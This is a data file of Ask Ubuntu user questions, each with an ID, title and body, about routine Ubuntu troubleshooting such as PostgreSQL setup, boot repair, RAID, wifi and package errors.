474152	postgresql has different version in ubuntu minimal ( server )	i bought an vps ( virtual private server ) and have installed ubuntu minimal ( server ) 12.04 32 bit on it for openerp use , and one of the openerp requirement is installing the postgresql i installed just simply like the usually sudo apt-get install postgresql but went i execute this command createuser -- createdb -- username postgres -- no-createrole -- no-superuser -- pwprompt openerp in postgres user it said : postgres @ furnia : ~ $ createuser -- createdb -- username postgres -- no-createrole -- no-superuser -- pwprompt openerp enter password for new role : enter it again : createuser : could not connect to database postgres : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? and when i restart the postgresql with /etc/init.d/postgresql restart it just skipped to next line and do nothing i start to check the whole postgresql in my server , and i discover that it 's different with the desktop version thanks for helping
474153	hardcoded static ip assignment for eth1	i 'm setting up a nat , and need to assign a static ip to my eth1 interface . the problem is that once in a while , it resets , and i need to run the following command again : sudo ifconfig eth1 192.168.47.1 netmask 255.255.255.0 i was wondering if i can hardcode this static ip to this interface . probably there should be a file which we would just need to modify , or so ?
474155	vlc playback error on dvd media	ubuntu 14.04 lts vlc ( latest version ) the problem lies with trying to play a pre-recorded dvd . this does not appear to be a region setting issue because the dvd in particular is one from a set and the others play without error . there is just one in particular that does not . in fact , an error is generated by ubuntu . http : //i216.photobucket.com/albums/cc27/mags367/ubuntu_011_zpsf7e58920.png~original incidentally , i in addtn to not being able to play the disc in 3 different oss using different media players , altho i can rip an .iso image from the disc , vlc wo n't play it . my question is , is it safe to assume the disc is damaged somehow ? [ nb : i do n't have an actual dvd player to be able to confirm that it plays . ]
474160	`` install new software '' button disappeared from eclipse	the help menu in eclipse has no `` install new software '' button so i ca n't install any new plugins : i 'm on ubuntu 14.04 . here 's my eclipse version : eclipse platform version : 4.3.2.v20140221-1852 build id : m20140221-1700
474163	how to change title bar color in gnome flashback compiz radiance theme in 14.04	i 'm using the gnome-flashback session ( with compiz ) in ubuntu 14.04 , and i mostly like the radiance theme . however , the title bar only changes subtly between the focused window and the unfocused windows , and i 'd like to have the focused window 's title bar a bright colour . i have copied the radiance theme directory to ~/.themes/my-radiance , and then selected this theme with gnome-tweak-tool . then changes i make show up , but i ca n't see what to change to affect the title bar colour . i have also tried the radiance-colors package available via a ppa , and i could n't see any changes when i selected one of its themes . thanks for any help !
474164	hard-disk is not detected	i tried the laptop ( samsungr530 , corei3 ) of my brother , who somewhat 'broke ' it : the laptop shutdowns after 30minutes or more . the fan is working , near the fan it seems a bit hot , i used after a vacuum cleaner on air outputs , to make sure . it has no more os currently , i tried to boot with an old windowsxp cd , and during the install it shutdown , i tried 3 times , same result . i got back with a 1g usb key , with ubuntu13.10 , using the 'try-ubuntu ' mode . the sensors seems showing a normal temperature . it did n't shutdown during almost one hour , but the issue is there is not hard drive mounted . it is of course not possible to install ubuntu , it says that there is not enough place ( 5.5g required ) commands outputs : sudo fdisk -l /dev/sda1 * 61 1981279 990609+ c w95 fat32 ( lba ) ( likewise gparted too , lists only my usb drive ) dmesg | grep 'logical blocks ' [ 12.911721 ] sd 5:0:0:0 : [ sda ] 1981440 512-byte logical blocks : ( 1.01 gb/967 mib ) dmesg | grep 'command line ' [ 0.000000 ] command line : file=/cdrom/preseed/ubuntu.seed boot=casper cdrom-detect/try-usb=true noprompt floppy.allowed_drive_mask=0 ignore_uuid initrd=/casper/initrd.lz quiet splash -- maybe-ubiquity
474165	how may one edit menu images in alacarte ?	in alacarte ( main menu ) i 'd love to be able to edit the images used for menu icons yet i currently ca n't . i think ( vaguely remember it ) that i used to be able to do this when i first started to use ubuntu ( about a year ago ) .
474166	how to safely remove a ubuntu-windows dualboot ?	i tried to do this one time before , but it completely failed . i wiped all of it 's partitions , and reclaimed the partitions within windows , however , that messed up grub and i could n't get back the the windows boot manager . then , i had to remove windows and completely wipe my hdd , and reinstall windows . i 've redone a dual boot , but i 'm looking to remove . can someone please help me fix this problem so that it does n't happen again ?
474167	800 kb/s wireless transfer ?	i 'm only getting 800 kb/s over the wireless network . i can get over 1 mb/s with torrents on either computer . should n't i be getting at least that when transferring files ? i just shared a folder and am copying it over .
474169	dual boot ubuntu samsung rf511-s07au	can i dual boot with windows 7 & ubuntu or its derivatives safely ? i am considering buying a samsung rf511-s07au second hand laptop . looking forward to your reply .
474176	where is my cd-rom mounted ?	how do i find out where my cd-rom is mounted ? just need a quick code . nothing complicated .
474178	how can i get the file from local server on my intranet instead of internet in hook install	i try to create hook -- > install for my charm ( home-made ) , i have the tar . as i see i can get the tar from internet link by wget and then save it on local hard . but if i went to get same file from local servers on intranet , what solution you suggest ?
474180	.wine-pipelight folder not present	following the instructions on the pipelight installation page , i installed pipelight on ubuntu 14.04 . however , upon opening firefox the .wine-pipelight folder is n't present in my home folder , and i get the following errors : [ pipelight : lin : unknown ] attached to process . [ pipelight : lin : unknown ] checking environment variable pipelight_silverlight5_1_config . [ pipelight : lin : unknown ] searching for config file pipelight-silverlight5.1 . [ pipelight : lin : unknown ] trying to load config file from '/home/alden/.config/pipelight-silverlight5.1 ' . [ pipelight : lin : silverlight5.1 ] basicplugin.c:427 : checksilverlightgraphicdriver ( ) : error in execlp command - probably silverlightgraphicdrivercheck not found or missing execute permission . [ pipelight : lin : silverlight5.1 ] basicplugin.c:441 : checksilverlightgraphicdriver ( ) : gpu driver check - your driver is not in the whitelist , hardware acceleration disabled . [ pipelight : lin : silverlight5.1 ] using wine prefix directory /home/alden/.wine-pipelight . [ pipelight : lin : silverlight5.1 ] checking plugin installation - this might take some time . [ pipelight : lin : silverlight5.1 ] basicplugin.c:374 : checkplugininstallation ( ) : error in execvp command - probably dependencyinstaller/sandbox not found or missing execute permission . [ pipelight : lin : silverlight5.1 ] basicplugin.c:384 : checkplugininstallation ( ) : plugin installer did not run correctly ( exitcode = 1 ) . [ pipelight : lin : silverlight5.1 ] basicplugin.c:108 : attach ( ) : plugin not correctly installed - aborting . i 've reinstalled quite a few times and ran through many of the common fixes offered on the pipelight launchpad pages and here on askubunta and still it fails to run . is there a reason why this folder is n't present , or why i 'm getting these errors ? edit : oddly enough , the .wine-pipelight folder is created wtih i open nitro , although this still does n't fix the issue . edit ii : the pipelight diagnostic tool tells me there are three things wrong . it says i fail the silverlight check ( meaning websites will think i do n't have silverlight installed ) , the dllpath/dllname check ( which i 've checked to make sure leads to a valid file ) , and the attempt to load /etc/issue ( which is definitely present ) . here 's a picture of the errors : and i 've uploaded my config file ( /usr/share/pipelight/configs/pipelight-silverlight5.1 ) which should be default : http : //pastebin.com/pza2yb1w
474181	how to convert an xfs file system to hfs+	i have repeatedly convinced of the reliability of the xfs file system , and i was more than satisfied . i was happy with everything in ubuntu 14.04 ( great software ) , but there is a little `` but ! `` basically , i work on osx-mavericks 10.9.3 , which sees very windows 8.1 and works wonders with ntfs , but does not see ubuntu ! briefly describe the equipment : asrock b75 pro3-m i5 3330 geforce gtx 650 ti sata 500gb running os x mavericks + clover - a boot disk toshiba 2tb running windows 8.1 ( x64 ) and ubuntu 14.04 ( amd64 ) if you boot from the toshiba ( where there is ubuntu and boot windows + grub ) after restart boot from clover , it is impossible . tried a lot of options - as clover installation and boot priority , and various settings for grub , but have not found an acceptable option and have no desire to reinstall again clover ( mavericks reboots 20 seconds - excellent ! ) so please help on the file system - how to convert from xfs to hfs+ journaled . mavericks to saw it all synced on mac . thank you for the sensible answer and help ! originally in russian .
474182	change deja-dup backup location	deja-dup backs up to my ubuntu one account , but ubuntu one is shutting down on june 1 . how can i change the settings so that deja-dup backs up to my google drive account ?
474185	trying to set up a social networking website need help !	i need help . i am trying to set up a social networking website at home just a small local website for right now . i am doing everything on my own . i turned my old 2009 hp desktop into a server , ubuntu server 14.04 , with light weight gui desktop , installed flashplugin and installed update , about to install openssh to be sure it 's on here . i think i choose samp also when i did the install cd today . i need to know how to create a remote access to this machine since i wo n't have anything connected to it besides power cord and ethernet cable . i would like remote access to the pc from another with my laptop so i do n't have to stay in one spot all the time . i have a few questions below . how do i do remote access , and what should i use ? - putty ? webmin ? database to store names and accounts of the social network : can i store database and web server together on the same computer ? what step would be after all this ? last question what commands should i do to complete setup for a website on the my old desktop ?
474186	usb 2.0 ports do n't work on sony vaio s series laptop	i have a sony vaio s-series laptop running ubuntu 14.04 lts . my usb 3.0 port works but my two usb 2.0 ports do not work . i 've read through this thread but could not find a solution to my problem . all usb ports work just fine in windows 8 ( i have this laptop set up to dual boot win8 and ubuntu ) but in ubuntu , the two usb 2.0 ports do n't even seem to charge my ipod when i connect it . what can i do to fix this problem ?
474188	how to mass install edubuntu on a chromebook ?	i 've been asked to post my question here from /r/ubuntu on reddit . i 'm prepping a computer-lab in a box project for a school in malawi , africa . one of my tasks is replacing the chromeos with edubuntu . i know the steps to update one computer ; but i 'd like to update in batches of 8 or all 32 if i have enough networking ports . anyone know of a way to do a mass install of ubuntu on chromebooks ?
474189	file permissions changed when using copy ( file syncing software )	i just started using copy , and it seems great , though i am having one difficulty . i 'm running two xubuntu linux computers , one at work and one at home . the one at work is 64 bit and the one at home is 32 bit ( i do n't know if this is a problem or not , though presumably it should n't be ) . the problem is that when i drop a file into the /copy folder from either end it 'll show up on the other computer but with its permissions changed . specifically , if i write a test ascii file in emacs and save it , it 'll have the permissions : -rw-rw-r -- 1 however , it 'll show up on the other end with permissions : -rwx -- -- -- 1 this can be particularly annoying , especially since executable files are colored green by the shell . is there any fix around this ?
474194	how to generate final application to publish in ubuntu touch apps ?	i created a simple application for ubuntu touch , but i do not know how to generate a final package . i click `` publish '' and put in the information needed ( name , maintainer , title , etc ... ) , but if i click `` create package '' , i received the error : it 's not supported to create click packages for a non ubuntusdk target . how do i generate a final application ? or is this final application the build generated ?
474196	installing armory on ubuntu after installing bitcoin	i installed bitcoin-qt with ubuntu 14.04 . i then installed armory using a method i found on the internet . however , i could not find the application . i downloaded it again using another method , and now the application icon appears , but it does n't open up . can anyone help me ? what should i do ?
474199	my ps3 controller stopped working 2 days ago	i used to use my ps3 controller to play games , and a couple of days ago it stopped working . i get this message during boot up ( after bios ) : [ ( some numers ) ] sony 0003.054c . ( more numbers ) : ca n't set operational mode qtsixa still recognizes the controller being plugged in . my best guess is there was an update to a dependent or repository or something . i also tried to connect a different ps3 controller with a different cord in a different usb slot - no change . i have also tried resetting them both with the little button on the back . i entered lsusb in terminal and in usb port 7 it says : sony corp. batoh device / playstation 3 controller jstest & antimicro do n't recognize that the controller is there .
474200	`apt-get update` does n't work with gui or terminal	wassim @ wassim-hp-250-g1-notebook-pc : ~ $ sudo apt-get update [ sudo ] password for wassim : e : malformed line 1 in source list /etc/apt/sources.list.d/google.list ( dist parse ) e : the list of sources could not be read . wassim @ wassim-hp-250-g1-notebook-pc : ~ $ sudo apt-get upgarde e : invalid operation upgarde wassim @ wassim-hp-250-g1-notebook-pc : ~ $ ^c wassim @ wassim-hp-250-g1-notebook-pc : ~ $
474203	having trouble installing kubuntu/ubuntu 14.04 on my computer	i having trouble install kubuntu & ubuntu 14.04 on my computer . the computer rebooted before it got to the desktop or any graphics ( when using a cd ) . i managed to install ubuntu server edition . i installed the kubuntu-desktop on the computer . now the computer reboots before it gets to any login screen . i think it might be because of the graphics driver . i have a radeon hd 4870 and i think that the graphics driver used is the open source radeon driver . is there a way for me to find caused the computer to reboot ? and what can i do to fix this ?
474204	i delete duplicate packages but canonical keeps reinstalling them , ubuntu 14.04	files at /var/lib/apt/lists w : duplicate sources.list entry http : //us.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages ( /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //us.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages ( /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty_main_binary-amd64_packages ) w : duplicate ... ... w : you may want to run apt-get update to correct these problems but , of course , running apt-get update only reinstalls them ! how can i fix this ?
474205	errors code : /var/cache/apt/archives/linux-image-3.8.0-19-generic_3.8.0-19.30~precise1_amd64.deb	$ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : linux-image-3.8.0-19-generic 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 6 not fully installed or removed . need to get 0 b/47.8 mb of archives . after this operation , 142 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 164064 files and directories currently installed . ) preparing to replace linux-image-3.8.0-19-generic 3.8.0-19.29 ( using ... /linux-image-3.8.0-19-generic_3.8.0-19.30~precise1_amd64.deb ) ... done . unpacking replacement linux-image-3.8.0-19-generic ... dpkg : error processing /var/cache/apt/archives/linux-image-3.8.0-19-generic_3.8.0-19.30~precise1_amd64.deb ( -- unpack ) : trying to overwrite '/lib/modules/3.8.0-19-generic/kernel/arch/x86/kvm/kvm-intel.ko ' , which is also in package linux-image-extra-3.8.0-19-generic 3.8.0-19.29 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-19-generic /boot/vmlinuz-3.8.0-19-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.8.0-19-generic_3.8.0-19.30~precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i get this update to work ?
474208	after wakeup or unlock , sudden shutdown	i use a notebook with ubuntu 14.04 , and in the first unlock it 's all ok , but all other unlocks or wake ups , after a few seconds the system suddenly shuts down . my notebook specs : processor : intel® core™ i5-3317u cpu @ 1.70ghz × 4 gpu : intel® ivybridge mobile 4000 ram : 8gb
474212	ca n't boot into ubuntu , boot-repair not working	earlier , i was working on my computer when everything froze and i had to force restart ; after turning it back on , it kept taking me to a strange window , what i think is the grub command-line ( excuse my terminology if it 's off ) . some of the errors i was getting were along the lines of `` error : ca n't read sector 0x2 from hd0 '' . i burned an ubuntu image on a flashdrive and tried boot-repair twice to no avail . here are the links to the first and second paste bins , respectively : paste.ubuntu.com/7547972 paste.ubuntu.com/7548248 if it helps , i 'm on a newer sony viao that originally had windows 8 on it .
474216	14.04 missing `` /etc/init.d/ufw '' ? my firewall never auto starts	i need to know how to fix the missing `` /etc/init.d/ufw '' file , is it some package or some command ? i used the gufw to enable it , but on reboot my firewall was still off ... i created a symlink /etc/init.d/ufw - > /lib/init/upstart-job but i could not make it work like start ufw ( neither after reboot ) . i found this file /lib/ufw/ufw-init , it looks like a init.d file ! can i copy or symlink it there ? additional ( optional ) questions : how to find what package has that file ? apt-cache search didnt work.. can we safely create such a script ? any idea why is it missing ? obs . : my /etc/ufw/ufw.conf has enabled=yes ( but seems useless ) . iptables -l becomes different after i ufw enable , so ufw rules are not being applied on boot by any other means . ps . : this script did not work either sudo ln -s /lib/ufw/ufw-init /usr/sbin/ufw-init sudo ln -s /lib/init/upstart-job /etc/init.d/ufw-init # sudo update-rc.d -f ufw-init remove sudo update-rc.d ufw-init defaults 99 sudo -k
474219	wifi is hard locked	i just got a new laptop and installed ubuntu on it . wi-fi worked fine on windows 8 , but now it says that it 's disabled by a hardware switch . rfkill unblock all did nothing . many people have suggested installing something , but there 's no ethernet port . tried using a usb dongle , that 's blocked too . do i have to go spend $ 25 on an ethernet to usb adapter i 'll only use once , or is there another way ? here 's the output of rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : no 7 : hci0 : bluetooth soft blocked : no hard blocked : no
474220	geany crashes when i try to debug cpp code ?	i try to use geany-plugin-debugger to debug my cpp code in geany . however , each time i load the compiled file , geany crashes .
474223	flickering cursor with 3 monitor setup	i have freshly installed ubuntu 14.04 and for some reason when i have all 3 monitors enabled i get a strange mouse flicker/lag.. but when i disable them and leave one enabled it 's all fine . i have 2x nvidia gtx670s
474225	i intend to install 14.04 onto a fresh crucial m500 ssd , but will it auto-format ?	i 'm hoping i can install my new crucial m500 ssd into my dell laptop , boot the 14.04 installation disc from the dvd drive , and get a fresh install without any preliminary hassle . ( intel i7 , originally with windows 8 , but i will wipe that out and install in legacy mode ) is there any warning i should be aware of ?
474228	ubuntu installation showing error	i have made a bootable ubuntu usb and now when i am trying to double-boot my system along with windows , it is showing me a error . `` windows boot manager '' then some code written and then /ubuntu/winboot/xyz.mbr ( xyz -- > i forgot the name ) . then `` info : some file is missing or have some errors . '' why is it so ? and how can i correct it ? please help . thanks in advance .
474231	netflix wont go full screen when using other programs	i 'm using 2 monitors and i like to surf reddit while watching netflix and when i click on another window it stops going full screen is there anyway lock it on fullscreen .
474232	ubuntu running like mud , system hangs and looks like its running at 3fps	the system specs : amd xp 3200+ 1gb ddr 333 ram 160 gb hd ide nvidia fx 5500 agp video card compaq presario sr1230nx the system takes forever to boot and when it does it runs like total mud , reminds me of an overloaded system that has too many windows open or something ... fresh install tried soo many thing like new memory ( it had 512 stick ) a new video card ( onboard 8mb sis sounded like the problem , but was n't ... has gotten a little faster now but not by much ) tried to disable all the things on the motherboard that could be , with no help ... this machine runs windows xp , 7 , and 8 just fine ! ! ! i mean for a single core cpu win8 runs awesome ! ! ! but i already have a gaming desktop that has windows 8 pro i want a linux machine to get some time in and learn a few things ... i want ubuntu because of the software center so i can install things i want until i am familiar with the command line.. i 've worked on computers since i was 12 i remember some of the dos commands but i guess these are a little different ... anyway any ideas ? i 've also tried both drivers for the nvida card and that did n't help either ... its not the card since it did this with both the nvida card and the sis on-board ... it also does this on live mode with the usb so i do n't think its the hard-drive ... i 'm running out of options of hardware to try ... i know this version of linux works cuz i 've booted it on other machines and it ran great ... what is with this compaq ? here is a video of exactly what its doing ... let me know if you need anything else i am right by the computer most times so ask anything ... http : //youtu.be/-p-xno81098
474233	forti vpn client not connecting to a server under ubuntu 14.04	i 've just updated to a new version of ubuntu ( 14.04 86x64 ) and i got a very strange problem with forti vpn client . it seems running smoothly , but when i try to connect via gui or terminal it hangs at the connection stage . here is what i see in terminal : status : :setting up the tunnel status : :connecting ... # and this takes forever i know that it 's not the problem with the server , the client works no problem on windows . thank in advance ...
474234	can i install/uninstall programs on a windows drive using a ubuntu 14.04 bootable flash drive ?	questions says most of it . i 'm just wondering if i can add or remove programs on a windows hard drive using a ubuntu 14.04 bootable flash drive . mostly to get past windows admin privileges . thanks
474236	error installing avogadro with cmake 'lconvert : could not exec no such file or directory '	i 'm brand new in ubuntu . i 'm trying to install avogadro . the program need the following packages , which i could install : cmake - openbabel 2.3.2 - qt4 - git - eigen2 . here it is the recepy to install the : cd $ home/src git clone git : //github.com/cryos/avogadro.git mkdir -p $ home/build/avogadro cd $ home/build/avogadro cmake $ home/src/avogadro make -j2 sudo make install it was unable to compile , but when i skipped the 'git clone ' step it seemed to work just fine . after several stops during the cmake compiling process ( software actualizations , get doxygen , get flex , get bison ) i was able to compile . but when i introduce the 'make -j2 ' command the installation stops as follows : orr22 @ javi-87 : ~/build_avogadro $ make -j2 [ 0 % ] built target elementcolor [ 0 % ] built target bsdyengine [ 2 % ] built target spglib [ 3 % ] built target navigatetool [ 4 % ] built target tubegen [ 4 % ] generating libavogadro_hu.qm [ 6 % ] built target openqube [ 6 % ] generating moc_animation.cxx lconvert : could not exec '/usr/lib/i386-linux-gnu/qt5/bin/lconvert ' : no such file or directory make [ 2 ] : *** [ libavogadro/src/libavogadro_hu.qm ] error 1 make [ 2 ] : *** se espera a que terminen otras tareas ... . make [ 1 ] : *** [ libavogadro/src/cmakefiles/avogadro.dir/all ] error 2 make : *** [ all ] error 2 any suggestions to proceed ? thanks in advance , orr22
474239	viewing solidworks files	is there software available with which i can open and view solidworks files sldprt , sldasm , slddrw . i am a relative novice , using ubuntu 12.04 . cheers .
474240	why does chrome on my ubuntu ( on all de ) does not have page actions ?	i 'm a chrome extension developer , and this lack of page actions is a bit weird . `` page action '' is like the rss icon in this image : chrome on my osx works fine .
474241	how to add more files to a finalized dvd ?	i have a finalized dvd ... but some documents were left to be put into the dvd . i want to burn the leftover files into that finalized disk . how to do that ? thank you in advance .
474249	linux container creation	i am new to linux containers and when i create a linux container with the help of the command lxc-create , it comes up with the following error : configuration path /var/lib/lxc not found the command lxc-create is rather present in /usr/bin . i am not able to come up with a solution to tackle this configuration error .
474257	can not connect to the internet . just installed 14.04	i just installed ubuntu 14.04 and took the necessary steps in `` software and updates '' to access the internet through wifi . that did not work on first attempt so u proceeded to connect via ethernet cable . that worked and the internet was running smoothly untill i tried downloading updates in the `` ubuntu software center '' . at that point my computer shut down involuntary and when i turned it back on i could not access the internet . that is where i 'm at now and i am stuck . thank you for your time !
474263	i am unable to lock cinelerra 4.4 to the launcher	i am using ubuntu 14.04 lts , and i installed cinelerra 4.4 . although it is working properly , i have to run it via the terminal every time to use it , and i can not lock it to the launcher .
474264	lubuntu resumes from standby half a second after going to sleep	so , i installed lubuntu 13.10 on a toshiba satellite c855d-s5900 , then i upgraded to 14.04 . whenever i tell it to sleep , or when the xfce4-power-manager tells it to sleep , it does so for about half a second , that is , the power light turns off for that long . then it 's back with the screensaver . this is an almost clean install , with only a minor adjustment to touchpad settings with synclient , and no unusual programs . what is causing the automatic wake from sleep and how do i stop it ?
474265	jpegs created by gimp unable to be read	just upgraded ubuntu to 14.04 and gimp to 2.8.10 . have used gimp for photo editing for some years with no previous problems . now when i edit a jpeg photo and export to jpeg or even overwrite the original jpeg the file is not able to be read on other systems . eg can read the jpegs straight from the camera on the smart tv or the photo print facility but not after they have been edited in gimp . the edited files can be read on my laptop in image viewer or shotwell or even on my wife 's win8 laptop . very frustrating as i have photos i want to take to be printed
474266	dell inspiron 600m	just wondering i want to install ubuntu on my ancient dell inspiron 600m is there any drivers i need to download and where can i download it ? thank you in advanced for all who help me on this . -cheers-
474268	raid device not detected	i create raid10 using `` mdadm -- create ... -- metadata=0.90 ... '' . there are four partitions which i name from /dev/md128 to /dev/md131 . first thing strange is that mdadm automatically changes them from /dev/md120 to /dev/md123 , why ? `` cat /proc/mdstat '' and `` mdadm -- detail -- scan '' seem normal . i meet some trouble doing `` grub-install /dev/sda '' , which reported disk `` /dev/md120 '' not detected . there are lots of discussions regarding this problem but no very clear solution . i end up manually modifying /boot/grub/device.map with a new line `` ( md120 ) /dev/md120 '' , then grub-install goes through with no error reported . when booting , after passing the machine logo , the next window shows raid volumes : not detected , followed by the information of four hard drives ( marked as not raid disk ) . then error : no such device plus a long key ( like uuid ) . then `` grub rescue > '' . in grub rescue , i try `` ls '' but `` ( md120 ) '' is not there . apparently , the raid is not recognized properly and previous `` grub-install '' is a fake success . already spent a few hours , so what goes wrong and how to fix it ? thanks a lot , really appreciated . btw , i install raid using system rescue cd and then chroot . the boot partition is imaged from another similar system . the content looks fine when i check . anyway , i feel it should n't matter because raid is not detected in the first place .
474270	typing freezes in chromium omnibox and enigmatic letter `` a '' in bar since ubuntu 14.04	since lubuntu/ubuntu 14.04 i ca n't use chromium browser , because serious typing freezes appears in chromium omnibox . it is possible type site address only in first tab , only one time after chromium restart . after this it is impossible to change anything in chromium omnibox by keyboard . it looks like keyboard not working completely . i used chromium few years from ubuntu 10.10 till 13.10 without problems . typing freezes appears from 14.04 in both lubuntu and ubuntu . another note . blue letter `` a '' appears in bar : exactly simultaneously with described problem . the letter is not a problem , but may it linked with typing freezes in some way . clicking on the blue letter `` a '' do n't give any effect . how to solve problem with typing freezes in chromium ? thanks .
474272	strange new directory ?	hi been using ubuntu for a few weeks now without a problem then i noticed a new directory in my home screen `` q1 ltzivqu '' if i tried to open or even hover over it the system crashed ? so i deleted it all seems ok but wondered if anyone has seen this before & could advise how to avoid it happening again , thanks pete
474275	bluetooth adapter not present in ubuntu 12.04.4 lts	i am using oracle virtual box [ 4.3.8 ] with windows 7 as host and ubuntu 12.04.4 as guest.my bluetooth adapter is working fine in windows but , no adapters found in ubuntu . how to solve this ? ...
474278	remote deskto viewer not access windows 7 ?	i have upgraded ubuntu 12.04 lts to 14.04 lts everything working fine but when ever i try to access my windows 7 machine via remote desktop viewer , did not get any view . why i unable to access my windows 7 machine .
474281	clicking on the app indicators iin the panel causes compiz to crash	so i have been using 14.04 for a couple of weeks without any problems but yesterday , after i installed a couple of new apps ( classic menu-indicator , diodon , tlp ) and now every time i try to click on any indicator on the panel , compiz crashes . the first couple of times compiz seems to restart and everything goes back to normal , but if i click the indicators more than twice compiz crashes for good and the entire system becomes unresponsive . any windows i have open lose their title bars and seem to work ok , but can not be closed as ctrl , alt buttons do n't seem to work . the only way out is then to do a hard reset of the system . the system log on clicking on the the indicators shows the following lines gnome-session [ 2333 ] : glib-critical : g_environ_setenv : assertion 'value ! = null ' failed may 30 12:17:37 compaq-610 gnome-session [ 2333 ] : warning : application 'compiz.desktop ' killed by signal 6 may 30 12:17:37 compaq-610 gnome-session [ 2333 ] : warning : app 'compiz.desktop ' respawning too quickly may 30 12:17:37 compaq-610 gnome-session [ 2333 ] : critical : we failed , but the fail whale is dead . sorry ... . any help on what may have gone wrong and how do i fix it will be greatly appreciated . thanks
474282	how to dual boot win8/ubuntu using uefi and two hdds	i 'd like to know what are the proper steps to have a working dual boot configuration which would allow me to have an ssd drive with an ubuntu install , and an hdd drive with a windows install . i ca n't seem to find these steps anywhere . i think i have to use uefi but please advise . also note that it 's ok with me to format both drives before going forward . thanks a bunch !
474284	should a gamer switch to ubuntu ?	i recently built a gaming pc , and i 'm just wondering if putting ubuntu ( or any linux os for that matter ) onto a pc that is going to be used mainly for gaming is a bad/good idea . i know a lot of games are only available for windows , the ones i play being skyrim and battlefield . would i still be able to play those games using wine ? or would i be better off using windows ? i have not installed any os yet , and i do n't plan on pirating windows to run the two operating systems side by side . it would either be ubuntu or windows . not both . so , please help ?
474285	unable to reinstall unity-2d on ubuntu 14.04 desktop lts ?	it is wiered that i 'm not able to reinstall unity-2d on my system . i removed it as it was not ready to go into the 2d mode . i have xrdp install for which i need unity-2d . after removing the unity-2d as it was not working properly . i run below command and then rebooted system before trying to reinstall it . apt-get -f purge unity-2d lightdm add-apt-repository -- remove ppa : unity-2d-team/unity-2d-daily apt-get -f purge apt-get -f remove apt-get -f autoremove apt-get -f remove apt-get clean apt-get autoclean dpkg -- configure -a then rebooted the system using init 6 now i took the ssh of my system and then i reinstalled unity using below commands apt-get -f install -- reinstall lightdm root @ searce-optiplex-380-01 : ~ # add-apt-repository `` deb http : //ppa.launchpad.net/unity-2d-team/unity-2d-daily/ubuntu trusty main '' root @ searce-optiplex-380-01 : ~ # add-apt-repository `` deb-src http : //ppa.launchpad.net/unity-2d-team/unity-2d-daily/ubuntu trusty main '' error : 'deb-src http : //ppa.launchpad.net/unity-2d-team/unity-2d-daily/ubuntu trusty main ' invalid root @ searce-optiplex-380-01 : ~ # add-apt-repository ppa : unity-2d-team/unity-2d-daily to install unity 2d , type the following commands in a terminal : $ sudo add-apt-repository ppa : unity-2d-team/unity-2d-daily $ sudo apt-get update $ sudo apt-get install unity-2d this will install all of the necessary dependencies to run unity 2d , including a `` unity 2d '' session that you 'll need to login with . then do the following : * log out * log back in and choose the `` unity 2d '' session in the drop-down menu at the bottom of the login screen * you will then be running unity 2d more info : https : //launchpad.net/~unity-2d-team/+archive/unity-2d-daily press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpe819_z9n/secring.gpg ' created gpg : keyring `/tmp/tmpe819_z9n/pubring.gpg ' created gpg : requesting key e32dd113 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpe819_z9n/trustdb.gpg : trustdb created gpg : key e32dd113 : public key `` launchpad ppa for unity-2d-team '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok then when i ran apt-get update everything goes well except 2 things below : 1 ) hit http : //archive.ubuntu.com trusty-backports/main sources err http : //ppa.launchpad.net trusty/main amd64 packages 404 not found hit http : //archive.ubuntu.com trusty-backports/restricted sources hit http : //archive.ubuntu.com trusty-backports/universe sources err http : //ppa.launchpad.net trusty/main i386 packages 404 not found 2 ) ign http : //archive.ubuntu.com trusty-proposed/universe translation-en_in w : failed to fetch http : //ppa.launchpad.net/unity-2d-team/unity-2d-daily/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/unity-2d-team/unity-2d-daily/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . root @ searce-optiplex-380-01 : ~ # above errors stared coming after i imported the ppa file of unity-2d , before that it was not there , still tried to reinstall unity-2d using below commands : root @ searce-optiplex-380-01 : ~ # apt-get -f reinstall unity-2d e : command line option 'f ' [ from -f ] is not known . root @ searce-optiplex-380-01 : ~ # apt-get -f install unity-2d reading package lists ... done building dependency tree reading state information ... done unity-2d is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . root @ searce-optiplex-380-01 : ~ # restart lightdm lightdm start/running , process 2926 root @ searce-optiplex-380-01 : ~ # did n't see any error while installing but even after restarting the lightdm or even after rebooting the system i am not able to see the unity-2d option at the login screen nor it is working in xrdp . also i do not see any menu or icons when i login to the system physically or over xrdp . can anyone help me . thanks in advance .
474290	ignore non-tuxonice kernel upgrades	i have the tuxonice kernel installed in kubuntu 14.04 . when there is a kernel update in the main ubuntu , it first appears as a `` vanilla '' kernel , and usually a few days later a -tuxonice update appears in the tuxonice ppa . i 'd like the updates notifier to ignore the vanilla kernels and only inform me about the -tuxonice kernels . is this possible ? how ?
